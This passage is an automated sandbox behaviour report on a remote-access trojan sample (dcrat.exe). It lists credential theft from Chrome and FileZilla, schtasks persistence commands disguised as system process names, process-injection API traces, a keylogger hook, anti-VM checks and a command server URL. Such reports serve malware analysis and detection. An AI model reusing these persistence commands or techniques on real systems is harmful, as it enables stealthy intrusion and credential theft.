NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b37000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Steals private information from local Internet browsers (8 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates a suspicious process (5 events)

cmdline	"schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\util\ProcessMonitor\taskhost.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Python27\Tools\i18n\WmiPrvSE.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "audiodg" /sc ONLOGON /tr "'C:\Sandbox\test22\DefaultBox\user\current\audiodg.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "SearchProtocolHost" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchProtocolHost.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\SearchIndexer.exe'" /rl HIGHEST /f

A process created a hidden window (6 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW March 17, 2021, 11:04 p.m.	thread_identifier: 2564 thread_handle: 0x00000390 process_identifier: 2612 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\SearchIndexer.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000398	1	1
CreateProcessInternalW March 17, 2021, 11:04 p.m.	thread_identifier: 1556 thread_handle: 0x00000390 process_identifier: 1824 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\util\ProcessMonitor\taskhost.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000039c	1	1
CreateProcessInternalW March 17, 2021, 11:04 p.m.	thread_identifier: 2228 thread_handle: 0x00000390 process_identifier: 1304 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "audiodg" /sc ONLOGON /tr "'C:\Sandbox\test22\DefaultBox\user\current\audiodg.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003a4	1	1
CreateProcessInternalW March 17, 2021, 11:04 p.m.	thread_identifier: 2044 thread_handle: 0x00000390 process_identifier: 192 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Python27\Tools\i18n\WmiPrvSE.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003ac	1	1
CreateProcessInternalW March 17, 2021, 11:04 p.m.	thread_identifier: 2760 thread_handle: 0x00000390 process_identifier: 2932 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "SearchProtocolHost" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchProtocolHost.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003b4	1	1
CreateProcessInternalW March 17, 2021, 11:04 p.m.	thread_identifier: 2772 thread_handle: 0x00000390 process_identifier: 1812 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchProtocolHost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003c0	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses March 17, 2021, 11:05 p.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x000aca00', u'virtual_address': u'0x00002000', u'entropy': 7.918356090801516, u'name': u'.text', u'virtual_size': u'0x000ac94c'}

entropy

7.9183560908

description

A section with a high entropy has been found

entropy

0.649882352941

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW March 17, 2021, 11:04 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 17, 2021, 11:05 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 17, 2021, 11:05 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Potentially malicious URLs were found in the process memory dump (16 events)

url	http://go2.microsoft.com/fwlink/?LinkId=131738
url	http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt0
url	http://www.microsoft.com/pki/certs/MicRooCerAut2011_2011_03_22.crt0
url	http://microsoft.com0
url	http://www.microsoft.com/pkiops/certs/MicCodSigPCA2011_2011-07-08.crt0
url	http://www.microsoft.com/Korea/MSDN/vstudio/
url	http://www.microsoft.com/pkiops/docs/primarycps.htm0
url	http://www.microsoft.com/pki/certs/MicCodSigPCA_08-31-2010.crt0
url	http://beta.visualstudio.net/net/sdk/feedback.asp
url	http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt0
url	http://www.microsoft.com/pki/certs/MicTimStaPCA_2010-07-01.crt0
url	http://www.microsoft.com/PKI/docs/CPS/default.htm0
url	http://www.microsoft.com/pki/certs/MicrosoftRootCert.crt0
url	http://ns.adobe.com/xap/1.0/
url	http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl0a
url	http://cd03477.tmweb.ru/s37gue3wcapintnq8aymsm4gxqthbf8ke/4xunxsulhh0vjwpro1yk0h20gz1osslxmtcnp352fd8u4inmyfrkt7qqfo5zvxwy/1qjf26r6i5eaf11049cwi97t4latqqpylcotv8zbuow2bxxg0lm7906kvfp0pnsg5nmc3x4ysz68otkbpj39nu

Yara rule detected in process memory (50 out of 353 events)

description	Code injection with CreateRemoteThread in a remote process	rule	inject_thread
description	Create a windows service	rule	create_service
description	Communications over UDP network	rule	network_udp_sock
description	Listen for incoming communication	rule	network_tcp_listen
description	Communications over P2P network	rule	network_p2p_win
description	Communications over HTTP	rule	network_http
description	File downloader/dropper	rule	network_dropper
description	Communications over FTP	rule	network_ftp
description	Communications over RAW socket	rule	network_tcp_socket
description	Communications use DNS	rule	network_dns
description	Communication using dga	rule	network_dga
description	Escalade priviledges	rule	escalate_priv
description	Take screenshot	rule	screenshot
description	Run a keylogger	rule	keylogger
description	Steal credential	rule	cred_local
description	Record Audio	rule	sniff_audio
description	APC queue tasks migration	rule	migrate_apc
description	Malware can spread east-west file	rule	spreading_file
description	Malware can spread east-west using share drive	rule	spreading_share
description	Create or check mutex	rule	win_mutex
description	Affect system registries	rule	win_registry
description	Affect system token	rule	win_token
description	Affect private profile	rule	win_private_profile
description	Affect private profile	rule	win_files_operation
description	Match Winsock 2 API library declaration	rule	Str_Win32_Winsock2_Library
description	Match Windows Inet API library declaration	rule	Str_Win32_Wininet_Library
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Code injection with CreateRemoteThread in a remote process	rule	inject_thread
description	Create a windows service	rule	create_service
description	Communications over UDP network	rule	network_udp_sock
description	Listen for incoming communication	rule	network_tcp_listen
description	Communications over P2P network	rule	network_p2p_win
description	Communications over HTTP	rule	network_http
description	File downloader/dropper	rule	network_dropper
description	Communications over FTP	rule	network_ftp

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess March 17, 2021, 11:05 p.m.	status_code: 0xffffffff process_identifier: 2428 process_handle: 0x000002b8		0	0
NtTerminateProcess March 17, 2021, 11:05 p.m.	status_code: 0xffffffff process_identifier: 2428 process_handle: 0x000002b8	1	0	0

Uses Windows utilities for basic Windows functionality (5 events)

cmdline	"schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\util\ProcessMonitor\taskhost.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Python27\Tools\i18n\WmiPrvSE.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "audiodg" /sc ONLOGON /tr "'C:\Sandbox\test22\DefaultBox\user\current\audiodg.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "SearchProtocolHost" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchProtocolHost.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\SearchIndexer.exe'" /rl HIGHEST /f

Executes one or more WMI queries which can be used to identify virtual machines (3 events)

wmi	SELECT * FROM Win32_Processor
wmi	SELECT * FROM Win32_BIOS
wmi	Select * From Win32_ComputerSystem

Communicates with host for which no DNS query was performed (1 event)

host

125.212.217.197

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 region_size: 401408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002b4	1	0
NtAllocateVirtualMemory March 17, 2021, 11:05 p.m.	process_identifier: 2428 region_size: 401408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002b4		3221225496
NtAllocateVirtualMemory March 17, 2021, 11:05 p.m.	process_identifier: 2164 region_size: 401408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002c8	1	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation March 17, 2021, 11:05 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

Installs itself for autorun at Windows startup (5 events)

cmdline	"schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\util\ProcessMonitor\taskhost.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Python27\Tools\i18n\WmiPrvSE.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "audiodg" /sc ONLOGON /tr "'C:\Sandbox\test22\DefaultBox\user\current\audiodg.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "SearchProtocolHost" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchProtocolHost.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\SearchIndexer.exe'" /rl HIGHEST /f

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Executes one or more WMI queries (8 events)

wmi	SELECT * FROM AntivirusProduct
wmi	SELECT * FROM Win32_DisplayConfiguration
wmi	Select * From Win32_ComputerSystem
wmi	SELECT * FROM FirewallProduct
wmi	SELECT * FROM Win32_BIOS
wmi	SELECT * FROM Win32_Processor
wmi	SELECT Caption FROM Win32_OperatingSystem
wmi	SELECT * FROM Win32_BaseBoard

Manipulates memory of a non-child process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1812 manipulating memory of non-child process 2428
NtAllocateVirtualMemory March 17, 2021, 11:05 p.m.	process_identifier: 2428 region_size: 401408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002b4		3221225496	0

Potential code injection by writing to the memory of another process (8 events)

Time & API	Arguments	Status	Return
WriteProcessMemory March 17, 2021, 11:04 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL>¦1`à.0^ @ `Kàè H.textd `.sdata\|& (@À.rsrcèà¬@@.reloc²@B base_address: 0x00400000 process_identifier: 1940 process_handle: 0x000002b4	1	1
WriteProcessMemory March 17, 2021, 11:04 p.m.	buffer: 8Ph à\üãêï»¿<\4VS_VERSION_INFO½ïþ[æ[æ?¼StringFileInfo040904B0Comments`@CompanyNameZoom Video Communications, Inc.,FileDescription@FileVersion5,4,58891,1115, InternalNameZoomnLegalCopyright© Zoom Video Communications, Inc. All rights reserved.4 LegalTrademarksZoom4 OriginalFilenameZoom, ProductNameZoomDProductVersion5,4,58891,1115DVarFileInfo$Translation °ï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0045e000 process_identifier: 1940 process_handle: 0x000002b4	1	1
WriteProcessMemory March 17, 2021, 11:04 p.m.	buffer: `? base_address: 0x00460000 process_identifier: 1940 process_handle: 0x000002b4	1	1
WriteProcessMemory March 17, 2021, 11:04 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1940 process_handle: 0x000002b4	1	1
WriteProcessMemory March 17, 2021, 11:05 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL>¦1`à.0^ @ `Kàè H.textd `.sdata\|& (@À.rsrcèà¬@@.reloc²@B base_address: 0x00400000 process_identifier: 2164 process_handle: 0x000002c8	1	1
WriteProcessMemory March 17, 2021, 11:05 p.m.	buffer: 8Ph à\üãêï»¿<\4VS_VERSION_INFO½ïþ[æ[æ?¼StringFileInfo040904B0Comments`@CompanyNameZoom Video Communications, Inc.,FileDescription@FileVersion5,4,58891,1115, InternalNameZoomnLegalCopyright© Zoom Video Communications, Inc. All rights reserved.4 LegalTrademarksZoom4 OriginalFilenameZoom, ProductNameZoomDProductVersion5,4,58891,1115DVarFileInfo$Translation °ï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0045e000 process_identifier: 2164 process_handle: 0x000002c8	1	1
WriteProcessMemory March 17, 2021, 11:05 p.m.	buffer: `? base_address: 0x00460000 process_identifier: 2164 process_handle: 0x000002c8	1	1
WriteProcessMemory March 17, 2021, 11:05 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2164 process_handle: 0x000002c8	1	1

Code injection by writing an executable or DLL to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory March 17, 2021, 11:04 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL>¦1`à.0^ @ `Kàè H.textd `.sdata\|& (@À.rsrcèà¬@@.reloc²@B base_address: 0x00400000 process_identifier: 1940 process_handle: 0x000002b4	1	1	0
WriteProcessMemory March 17, 2021, 11:05 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL>¦1`à.0^ @ `Kàè H.textd `.sdata\|& (@À.rsrcèà¬@@.reloc²@B base_address: 0x00400000 process_identifier: 2164 process_handle: 0x000002c8	1	1	0

Creates a windows hook that monitors keyboard input (keylogger) (1 event)

Time & API	Arguments	Status	Return	Repeated
SetWindowsHookExW March 17, 2021, 11:05 p.m.	thread_identifier: 0 callback_function: 0x003909ea hook_identifier: 13 (WH_KEYBOARD_LL) module_address: 0x00000000	1	525085	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1908 called NtSetContextThread to modify thread in remote process 1940
Process injection	Process 1812 called NtSetContextThread to modify thread in remote process 2164
NtSetContextThread March 17, 2021, 11:04 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4562782 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002b0 process_identifier: 1940	1	0	0
NtSetContextThread March 17, 2021, 11:05 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4562782 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002b8 process_identifier: 2164	1	0	0

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (17 events)

Time & API	Arguments	Status	Return
CryptHashData March 17, 2021, 11:04 p.m.	buffer: 0a71993a2057b68fddd6b74cedac6269343beb68TEST22-PCtest22 hash_handle: 0x00516c98 flags: 0	1	1
CryptHashData March 17, 2021, 11:04 p.m.	buffer: 0a71993a2057b68fddd6b74cedac6269343beb68TEST22-PCtest22 hash_handle: 0x00516c98 flags: 0	1	1
CryptHashData March 17, 2021, 11:04 p.m.	buffer: 0a71993a2057b68fddd6b74cedac6269343beb68TEST22-PCtest22 hash_handle: 0x00516c98 flags: 0	1	1
CryptHashData March 17, 2021, 11:04 p.m.	buffer: 0a71993a2057b68fddd6b74cedac6269343beb68TEST22-PCtest22 hash_handle: 0x00516c98 flags: 0	1	1
CryptHashData March 17, 2021, 11:05 p.m.	buffer: 0a71993a2057b68fddd6b74cedac6269343beb68TEST22-PCtest22 hash_handle: 0x00780040 flags: 0	1	1
CryptHashData March 17, 2021, 11:05 p.m.	buffer: 0a71993a2057b68fddd6b74cedac6269343beb68TEST22-PCtest22 hash_handle: 0x00780040 flags: 0	1	1
CryptHashData March 17, 2021, 11:05 p.m.	buffer: 0a71993a2057b68fddd6b74cedac6269343beb68TEST22-PCtest22 hash_handle: 0x00780040 flags: 0	1	1
CryptHashData March 17, 2021, 11:05 p.m.	buffer: 0a71993a2057b68fddd6b74cedac6269343beb68TEST22-PCtest22 hash_handle: 0x00780040 flags: 0	1	1
CryptHashData March 17, 2021, 11:05 p.m.	buffer: 0a71993a2057b68fddd6b74cedac6269343beb68TEST22-PCtest22 hash_handle: 0x00780040 flags: 0	1	1
CryptHashData March 17, 2021, 11:05 p.m.	buffer: 0a71993a2057b68fddd6b74cedac6269343beb68TEST22-PCtest22 hash_handle: 0x00780040 flags: 0	1	1
CryptHashData March 17, 2021, 11:05 p.m.	buffer: 0a71993a2057b68fddd6b74cedac6269343beb68TEST22-PCtest22 hash_handle: 0x00780040 flags: 0	1	1
CryptHashData March 17, 2021, 11:05 p.m.	buffer: 0a71993a2057b68fddd6b74cedac6269343beb68TEST22-PCtest22 hash_handle: 0x00780040 flags: 0	1	1
CryptHashData March 17, 2021, 11:05 p.m.	buffer: 0a71993a2057b68fddd6b74cedac6269343beb68TEST22-PCtest22 hash_handle: 0x00780040 flags: 0	1	1
CryptHashData March 17, 2021, 11:05 p.m.	buffer: 0a71993a2057b68fddd6b74cedac6269343beb68TEST22-PCtest22 hash_handle: 0x00780040 flags: 0	1	1
CryptHashData March 17, 2021, 11:05 p.m.	buffer: 0a71993a2057b68fddd6b74cedac6269343beb68TEST22-PCtest22 hash_handle: 0x00780040 flags: 0	1	1
CryptHashData March 17, 2021, 11:05 p.m.	buffer: 0a71993a2057b68fddd6b74cedac6269343beb68TEST22-PCtest22 hash_handle: 0x00780040 flags: 0	1	1
CryptHashData March 17, 2021, 11:05 p.m.	buffer: 0a71993a2057b68fddd6b74cedac6269343beb68TEST22-PCtest22 hash_handle: 0x00780040 flags: 0	1	1

Attempts to remove evidence of file being downloaded from the Internet (5 events)

file	C:\Sandbox\test22\DefaultBox\user\current\audiodg.exe:Zone.Identifier
file	C:\Python27\Tools\i18n\WmiPrvSE.exe:Zone.Identifier
file	C:\util\ProcessMonitor\taskhost.exe:Zone.Identifier
file	C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchProtocolHost.exe:Zone.Identifier
file	C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\SearchIndexer.exe:Zone.Identifier

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1908 resumed a thread in remote process 1940
Process injection	Process 1812 resumed a thread in remote process 2164
NtResumeThread March 17, 2021, 11:04 p.m.	thread_handle: 0x000002b0 suspend_count: 1 process_identifier: 1940	1	0	0
NtResumeThread March 17, 2021, 11:05 p.m.	thread_handle: 0x000002b8 suspend_count: 1 process_identifier: 2164	1	0	0

Executed a process and injected code into it, probably while unpacking (50 out of 70 events)

Time & API	Arguments	Status	Return
NtResumeThread March 17, 2021, 11:03 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 1908	1	0
NtResumeThread March 17, 2021, 11:03 p.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 1908	1	0
NtResumeThread March 17, 2021, 11:03 p.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 1908	1	0
NtResumeThread March 17, 2021, 11:03 p.m.	thread_handle: 0x000002ac suspend_count: 1 process_identifier: 1908	1	0
NtGetContextThread March 17, 2021, 11:03 p.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread March 17, 2021, 11:03 p.m.	thread_handle: 0x000000e8	1	0
NtResumeThread March 17, 2021, 11:03 p.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 1908	1	0
CreateProcessInternalW March 17, 2021, 11:04 p.m.	thread_identifier: 1436 thread_handle: 0x000002b0 process_identifier: 1940 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\dcrat.exe track: 1 command_line: "{path}" filepath_r: C:\Users\test22\AppData\Local\Temp\dcrat.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000002b4	1	1
NtGetContextThread March 17, 2021, 11:04 p.m.	thread_handle: 0x000002b0	1	0
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 region_size: 401408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002b4	1	0
WriteProcessMemory March 17, 2021, 11:04 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL>¦1`à.0^ @ `Kàè H.textd `.sdata\|& (@À.rsrcèà¬@@.reloc²@B base_address: 0x00400000 process_identifier: 1940 process_handle: 0x000002b4	1	1
WriteProcessMemory March 17, 2021, 11:04 p.m.	buffer: base_address: 0x00402000 process_identifier: 1940 process_handle: 0x000002b4	1	1
WriteProcessMemory March 17, 2021, 11:04 p.m.	buffer: base_address: 0x0045a000 process_identifier: 1940 process_handle: 0x000002b4	1	1
WriteProcessMemory March 17, 2021, 11:04 p.m.	buffer: 8Ph à\üãêï»¿<\4VS_VERSION_INFO½ïþ[æ[æ?¼StringFileInfo040904B0Comments`@CompanyNameZoom Video Communications, Inc.,FileDescription@FileVersion5,4,58891,1115, InternalNameZoomnLegalCopyright© Zoom Video Communications, Inc. All rights reserved.4 LegalTrademarksZoom4 OriginalFilenameZoom, ProductNameZoomDProductVersion5,4,58891,1115DVarFileInfo$Translation °ï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0045e000 process_identifier: 1940 process_handle: 0x000002b4	1	1
WriteProcessMemory March 17, 2021, 11:04 p.m.	buffer: `? base_address: 0x00460000 process_identifier: 1940 process_handle: 0x000002b4	1	1
WriteProcessMemory March 17, 2021, 11:04 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1940 process_handle: 0x000002b4	1	1
NtSetContextThread March 17, 2021, 11:04 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4562782 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002b0 process_identifier: 1940	1	0
NtResumeThread March 17, 2021, 11:04 p.m.	thread_handle: 0x000002b0 suspend_count: 1 process_identifier: 1940	1	0
NtResumeThread March 17, 2021, 11:04 p.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 1940	1	0
NtResumeThread March 17, 2021, 11:04 p.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 1940	1	0
NtResumeThread March 17, 2021, 11:04 p.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 1940	1	0
NtResumeThread March 17, 2021, 11:04 p.m.	thread_handle: 0x00000234 suspend_count: 1 process_identifier: 1940	1	0
NtResumeThread March 17, 2021, 11:04 p.m.	thread_handle: 0x0000029c suspend_count: 1 process_identifier: 1940	1	0
NtResumeThread March 17, 2021, 11:04 p.m.	thread_handle: 0x0000030c suspend_count: 1 process_identifier: 1940	1	0
NtResumeThread March 17, 2021, 11:04 p.m.	thread_handle: 0x00000328 suspend_count: 1 process_identifier: 1940	1	0
CreateProcessInternalW March 17, 2021, 11:04 p.m.	thread_identifier: 2564 thread_handle: 0x00000390 process_identifier: 2612 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\SearchIndexer.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000398	1	1
CreateProcessInternalW March 17, 2021, 11:04 p.m.	thread_identifier: 1556 thread_handle: 0x00000390 process_identifier: 1824 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\util\ProcessMonitor\taskhost.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000039c	1	1
CreateProcessInternalW March 17, 2021, 11:04 p.m.	thread_identifier: 2228 thread_handle: 0x00000390 process_identifier: 1304 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "audiodg" /sc ONLOGON /tr "'C:\Sandbox\test22\DefaultBox\user\current\audiodg.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003a4	1	1
